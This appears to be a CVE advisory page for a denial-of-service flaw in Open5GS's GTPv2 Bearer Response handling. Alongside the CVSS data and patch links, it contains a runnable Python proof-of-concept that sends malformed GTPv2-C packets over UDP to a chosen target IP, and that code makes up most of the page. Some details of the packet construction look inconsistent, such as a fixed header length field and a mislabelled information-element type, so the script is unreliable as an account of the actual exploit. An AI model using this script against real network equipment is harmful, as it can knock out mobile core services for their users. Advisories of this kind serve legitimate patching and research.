Security Vulnerability Report
CVE-2025-15528 CVSS 5.3 MEDIUM

CVE-2025-15528

Published: 2026-01-16 22:16:18
Last Modified: 2026-02-23 09:16:28

Description

A vulnerability has been found in Open5GS up to 2.7.6. Affected by this vulnerability is an unknown functionality of the component GTPv2 Bearer Response Handler. Such manipulation leads to denial of service. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The name of the patch is 98f76e98df35cd6a35e868aa62715db7f8141ac1. A patch should be applied to remediate this issue.

CVSS Details

CVSS Score: 5.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:open5gs:open5gs:*:*:*:*:*:*:*:* - VULNERABLE
Open5GS < 2.7.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
"""
CVE-2025-15528 PoC - Open5GS GTPv2 Bearer Response DoS
This PoC demonstrates sending a malformed GTPv2 Bearer Response
to trigger denial of service in Open5GS <= 2.7.6
Note: For authorized security testing only
"""
import socket
import struct
import random


def build_gtpv2_header(teid, message_type, seq_num):
    """Build GTPv2-C header"""
    # Version (1) + Flag (1) + Message Type (1) + Length (2)
    version_flag = 0x48  # Version=1, TEID present=1, Piggybacking=0
    header = struct.pack('!BBH',
        version_flag,
        message_type,
        0x0004  # Length of TEID + sequence + spare
    )
    # TEID (4 bytes)
    header += struct.pack('!I', teid)
    # Sequence number (3 bytes) + Spare (1 byte)
    header += struct.pack('!I', seq_num)[1:] + b'\x00'
    return header


def send_malformed_bearer_response(target_ip, target_port=2123):
    """
    Send malformed GTPv2 Bearer Response to trigger DoS
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(5)

    # GTPv2-C Message Type for Bearer Response is 0x36
    header = build_gtpv2_header(
        teid=0x00000000,  # Control plane TEID
        message_type=0x36,  # Bearer Response
        seq_num=random.randint(0, 0xFFFFFF)
    )

    # Malformed IE (Information Element) with invalid values
    # IE Type for Bearer Context (0x57)
    ie_type_bearer_context = 0x57
    # Invalid length to cause parsing error
    ie_data = b'\x00' * 4  # Truncated/malformed data
    ie = struct.pack('!BBH', ie_type_bearer_context, 0x00, len(ie_data)) + ie_data

    packet = header + ie

    try:
        sock.sendto(packet, (target_ip, target_port))
        print(f"[+] Malformed GTPv2 Bearer Response sent to {target_ip}:{target_port}")
        print(f"[+] Packet length: {len(packet)} bytes")
        return True
    except Exception as e:
        print(f"[-] Error: {e}")
        return False
    finally:
        sock.close()


if __name__ == "__main__":
    import sys
    if len(sys.argv) < 2:
        print("Usage: python cve_2025_15528_poc.py <target_ip>")
        sys.exit(1)
    target = sys.argv[1]
    send_malformed_bearer_response(target)
```

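References

https://github.com/open5gs/open5gs/
https://github.com/open5gs/open5gs/commit/98f76e98df35cd6a35e868aa62715db7f8141ac1 (Patch)
https://github.com/open5gs/open5gs/issues/4225 (Exploit, Issue Tracking, Vendor Advisory)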
